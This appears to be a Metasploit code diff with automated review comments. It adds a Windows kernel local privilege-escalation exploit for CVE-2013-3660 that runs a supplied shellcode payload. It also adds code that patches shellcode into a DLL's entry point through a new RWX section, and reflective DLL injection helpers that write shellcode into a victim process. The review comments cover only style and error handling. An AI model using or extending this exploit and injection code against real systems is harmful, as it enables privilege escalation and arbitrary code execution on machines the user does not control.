OutputDebugStringA(buffer);
}
#else
#define dprintf(...)
#define LogMessage(...)
#endif
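Review bot: The first hunk removes `<stdio.h>`, `<stdarg.h>`, `<windows.h>` and the other system includes from this header, yet the `real_dprintf` body that stays in the header still uses `va_list`, `strcat_s` and `OutputDebugStringA`, so the header now compiles only when the including file has already pulled those in (in ComplexPath.c that presumably happens through ReflectiveLoader.h, which is included first, but nothing states it). A comment at the top of the header, `// Requires <windows.h> and the CRT (va_list, strcat_s) to be included first; ComplexPath.c gets them via ReflectiveLoader.h`, would record that dependency. In the last hunk the `#else` branch defines `dprintf(...)` and `LogMessage(...)` as empty, which also silently discards any argument side effects in a non-trace build; `#define dprintf(...) do {} while (0)` and `#define LogMessage(...) do {} while (0)` (no trailing semicolon, unlike the removed `do{}while(0);`) keep the statement shape without that trap. ComplexPath.c repeats the same `#define LogMessage(...)` under its own `#else`; an identical redefinition is legal but one of the two copies should go.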


@ -1,15 +1,15 @@
//===============================================================================================//
// This is a stub for the actuall functionality of the DLL.
// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
//===============================================================================================//
#include "ReflectiveLoader.h"
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "ComplexPath.h"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
}
}
VOID elevator_complex_path()
/*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
VOID elevator_complex_path(LPVOID lpPayload)
{
HANDLE Thread;
HDC Device;
@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n");
if (lpPayload == NULL) {
LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
return;
}
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is
// available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished);
//ExitProcess(0);
CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
}
@ -756,7 +775,8 @@ VOID elevator_complex_path()
}
// A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;
@ -774,23 +794,29 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
//fflush(stdout);
//flush(stderr);
return TRUE;
}
extern HINSTANCE hAppInstance;
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
#else
#define LogMessage(...)
#endif
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch( dwReason )
dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
switch (dwReason)
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
hAppInstance = hinstDLL;
elevator_complex_path();
dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
elevator_complex_path(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
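Review bot: In the `LogMessage` hunk the definition changes from `BOOL` to `VOID LogMessage(LEVEL Level, PCHAR Format, ...)`, but the unchanged `return TRUE;` just before the closing brace still returns a value; since the whole function now sits under `#ifdef DEBUGTRACE` this only surfaces in a trace build, where MSVC warns about a void function returning a value and a C++ compile fails, so it should become a bare `return;` or be dropped. In the success path, `CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);` discards the handle unchecked; `HANDLE hThread = CreateThread(0, 0, execute_payload, lpPayload, 0, NULL); if (hThread) CloseHandle(hThread); else LogMessage(L_ERROR, "[PPRFLATTENREC] CreateThread failed: %u", GetLastError());` closes the leak and records the failure. The error tag `[PRFLATTENREC]` in the NULL-payload check differs from the `[PPRFLATTENREC]` prefix every other message in this file uses. In `DllMain`, `lpReserved` is read as the payload pointer on `DLL_PROCESS_ATTACH`, which is a convention of the custom reflective loader rather than the documented Windows meaning of that argument; a comment such as `// lpReserved carries the payload pointer handed over by the reflective loader, not the OS-supplied value` would stop the next reader from "fixing" it. `DllMain` continues past the end of the hunk.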


@ -0,0 +1,141 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{942BF20A-E438-48B0-A614-A6E0CC2E94BD}</ProjectGuid>
<RootNamespace>ppr_flatten_rec</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ppr_flatten_rec.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ppr_flatten_rec.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>


@ -0,0 +1,9 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
</Project>


@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT%
POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%
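Review bot: The new CVE-2013-3660 build runs only while `%ERRORLEVEL%` from the preceding `msbuild.exe` call is 0, so a failure in the earlier project silently skips `ppr_flatten_rec` and the script still prints `Finished`. If the two projects are independent, drop the guard; otherwise add an `ELSE ( ECHO "Skipping CVE-2013-3660: previous build failed" )` so the skipped build is visible in the output. The `IF` line at the top of the hunk is context, so the guard itself may pre-date this change; only the PUSHD/msbuild/POPD block inside it is new here.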


@ -16,11 +16,15 @@ module Buffer
#
# Serializes a buffer to a provided format. The formats supported are raw,
# ruby, perl, bash, c, js_be, js_le, java and psh
# num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
#
def self.transform(buf, fmt = "ruby")
case fmt
when 'raw'
when 'num'
buf = Rex::Text.to_num(buf)
when 'dword', 'dw'
buf = Rex::Text.to_dword(buf)
when 'python', 'py'
buf = Rex::Text.to_python(buf)
when 'ruby', 'rb'
@ -54,11 +58,13 @@ module Buffer
#
# Creates a comment using the supplied format. The formats supported are
# raw, ruby, perl, bash, js_be, js_le, c, and java.
# raw, ruby, python, perl, bash, js_be, js_le, c, and java.
#
def self.comment(buf, fmt = "ruby")
case fmt
when 'raw'
when 'num', 'dword', 'dw'
buf = Rex::Text.to_js_comment(buf)
when 'ruby', 'rb', 'python', 'py'
buf = Rex::Text.to_ruby_comment(buf)
when 'perl', 'pl'
@ -84,19 +90,28 @@ module Buffer
# Returns the list of supported formats
#
def self.transform_formats
['raw',
'ruby','rb',
'perl','pl',
'bash','sh',
[
'bash',
'c',
'csharp',
'dw',
'dword',
'java',
'js_be',
'js_le',
'java',
'python','py',
'powershell','ps1',
'vbscript',
'vbapplication'
'num',
'perl',
'pl',
'powershell',
'ps1',
'py',
'python',
'raw',
'rb',
'ruby',
'sh',
'vbapplication',
'vbscript'
]
end
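Review bot: The doc comment above `comment` in the second hunk still lists only `raw, ruby, python, perl, bash, js_be, js_le, c, and java`, although the method now also accepts `num`, `dword` and `dw` (routed to `to_js_comment`); update it to `# raw, num, dword, dw, ruby, python, perl, bash, js_be, js_le, c, and java.` In the third hunk `transform_formats` now advertises `csharp`, but the `transform` case shown in the first hunk has no visible `when 'csharp'` branch; if that branch exists outside the hunk this is fine, otherwise the advertised list and the dispatcher disagree and `transform(buf, 'csharp')` would fall through to whatever the unseen `else` does. The `transform` doc line could also name the `dw` and `py` aliases that its `when` clauses accept.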


@ -31,14 +31,12 @@ module Exe
def create_thread_stub
<<-EOS
hook_entrypoint:
pushad
push hook_libname
call [iat_LoadLibraryA]
push hook_funcname
push eax
call [iat_GetProcAddress]
mov eax, [iat_CreateThread]
lea edx, [thread_hook]
push 0
push 0
@ -68,8 +66,9 @@ module Exe
return asm
end
def payload_stub
asm = create_thread_stub
def payload_stub(prefix)
asm = "hook_entrypoint:\n#{prefix}\n"
asm << create_thread_stub
asm << payload_as_asm
shellcode = Metasm::Shellcode.assemble(processor, asm)
shellcode.encoded
@ -85,14 +84,37 @@ module Exe
pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
pe.header.time = pe_orig.header.time
# Don't rebase if we can help it since Metasm doesn't do relocations well
pe.optheader.dll_characts.delete("DYNAMIC_BASE")
prefix = ''
if pe.header.characteristics.include? "DLL"
# if there is no entry point, just return after we bail or spawn shellcode
if pe.optheader.entrypoint == 0
prefix = "cmp [esp + 8], 1
jz spawncode
entrypoint:
xor eax, eax
inc eax
ret 0x0c
spawncode:"
else
# there is an entry point, we'll need to go to it after we bail or spawn shellcode
# if fdwReason != DLL_PROCESS_ATTACH, skip the shellcode, jump back to original DllMain
prefix = "cmp [esp + 8], 1
jnz entrypoint"
end
end
# Generate a new code section set to RWX with our payload in it
s = Metasm::PE::Section.new
s.name = '.text'
s.encoded = payload_stub
s.encoded = payload_stub prefix
s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
# Tell our section where the original entrypoint was
if pe.optheader.entrypoint != 0
s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
end
pe.sections << s
pe.invalidate_header
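Review bot: `payload_stub` now takes a required `prefix` argument but nothing documents what it must contain: assembly emitted directly after the `hook_entrypoint:` label and before the thread stub, which may reference the `entrypoint` label that is only fixed up later when `pe.optheader.entrypoint != 0`. Add a YARD tag such as `# @param prefix [String] assembly inserted after hook_entrypoint:, may reference the entrypoint label` to the definition. For consistency with `create_thread_stub` (a `<<-EOS` heredoc) the two inline assembly strings in the DLL branch would read better as heredocs than as multi-line string literals with embedded indentation, and the `1` compared against `[esp + 8]` deserves the `DLL_PROCESS_ATTACH` comment in the first branch as well as the second. The enclosing method continues past the end of the hunk.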


@ -45,7 +45,8 @@ class Msf::Module::Author
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com'
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'wvu' => 'wvu' + 0x40.chr + 'metasploit.com'
}
#


@ -102,8 +102,6 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
elsif (in_ctx_id == 'MSB')
self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx'
elsif (in_ctx_id == 'MIL')
self.site = 'http://milw0rm.com/metasploit/' + in_ctx_val.to_s
elsif (in_ctx_id == 'EDB')
self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
elsif (in_ctx_id == 'WVE')


@ -1,7 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
require 'msf/core/reflective_dll_loader'
module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject
end
def stage_payload(target_id=nil)
dll = ""
offset = 0
begin
File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
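Review bot: The removed `begin/rescue` used to `print_error` and `return` from `stage_payload` on a missing or malformed DLL, whereas `load_rdi_dll` raises a bare `RuntimeError` (and `File.open` an `Errno`), so those conditions now propagate out of the stage to whichever caller drives it; the comment `# Exceptions will be thrown by the mixin if there are issues.` acknowledges this but the method does not say it raises. Either rescue here, e.g. `rescue => e` / `print_error("Failed to load #{library_path}: #{e.message}")` / `return`, or add `# @raise` documentation to `stage_payload` so the caller's responsibility is explicit. The same applies to the x64 variant in the next file section. The rest of `stage_payload` is outside the hunk.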


@ -1,7 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
require 'msf/core/reflective_dll_loader'
module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject_x64
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject_x64
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject_x64
end
def stage_payload
dll = ""
offset = 0
begin
::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration


@ -0,0 +1,60 @@
# -*- coding: binary -*-
require 'msf/core/reflective_dll_loader'
###
#
# This module exposes functionality which makes it easier to do
# Reflective DLL Injection into processes on a victim's machine.
#
###
module Msf::Post::Windows::ReflectiveDLLInjection
include Msf::ReflectiveDLLLoader
PAGE_ALIGN = 1024
#
# Inject the given shellcode into a target process.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param shellcode [String] The shellcode to inject.
#
# @return [Fixnum] Address of the shellcode in the target process's
# memory.
#
def inject_into_process(process, shellcode)
shellcode_size = shellcode.length
unless shellcode.length % PAGE_ALIGN == 0
shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
end
shellcode_mem = process.memory.allocate(shellcode_size)
process.memory.protect(shellcode_mem)
process.memory.write(shellcode_mem, shellcode)
return shellcode_mem
end
#
# Inject a reflectively-injectable DLL into the given process
# using reflective injection.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param dll_path [String] Path to the DLL that is to be loaded and injected.
#
# @return [Array] Tuple of allocated memory address and offset to the
# +ReflectiveLoader+ function.
#
def inject_dll_into_process(process, dll_path)
dll, offset = load_rdi_dll(dll_path)
dll_mem = inject_into_process(process, dll)
return dll_mem, offset
end
end
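Review bot: `PAGE_ALIGN = 1024` is not the page size on x86/x64 Windows (hardware pages are 4 KiB), so the constant's name misleads; if the intent is only to round the allocation up, name it for what it is (e.g. `ALLOC_GRANULARITY`) with a comment, and the rounding collapses to `shellcode_size = (shellcode.length + PAGE_ALIGN - 1) / PAGE_ALIGN * PAGE_ALIGN`. `process.memory.protect(shellcode_mem)` is called with no protection argument, so the page protection the caller ends up with depends on that method's default (presumably executable, since the memory is meant to run shellcode — worth stating in the docstring with `# The region is left with protect's default protection; confirm it is executable`). The explicit `return shellcode_mem` and `return dll_mem, offset` are unnecessary in Ruby.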


@ -0,0 +1,43 @@
# -*- coding: binary -*-
###
#
# This mixin contains functionality which loads a Reflective
# DLL from disk into memory and finds the offset of the
# reflective loader's entry point.
#
###
module Msf::ReflectiveDLLLoader
#
# Load a reflectively-injectable DLL from disk and find the offset
# to the ReflectiveLoader function inside the DLL.
#
# @param dll_path Path to the DLL to load.
#
# @return [Array] Tuple of DLL contents and offset to the
# +ReflectiveLoader+ function within the DLL.
#
def load_rdi_dll(dll_path)
dll = ''
offset = nil
::File.open(dll_path, 'rb') { |f| dll = f.read }
pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
pe.exports.entries.each do |e|
if e.name =~ /^\S*ReflectiveLoader\S*/
offset = pe.rva_to_file_offset(e.rva)
break
end
end
unless offset
raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
end
return dll, offset
end
end
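Review bot: `load_rdi_dll` raises a bare `RuntimeError` via `raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"`, so callers cannot rescue this case separately from an `Errno::ENOENT` out of `File.open` or a parse failure inside `Rex::PeParsey`; declare `class Error < StandardError; end` under the module, `raise Error, ...`, and document the conditions with `# @raise` tags. The export search `/^\S*ReflectiveLoader\S*/` anchors per line with `^` and the surrounding `\S*` add nothing, so `e.name.include?('ReflectiveLoader')` expresses the same test. `dll = ''` followed by `::File.open(dll_path, 'rb') { |f| dll = f.read }` can be `dll = ::File.binread(dll_path)`, and the `@param dll_path` tag is missing its `[String]` type.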


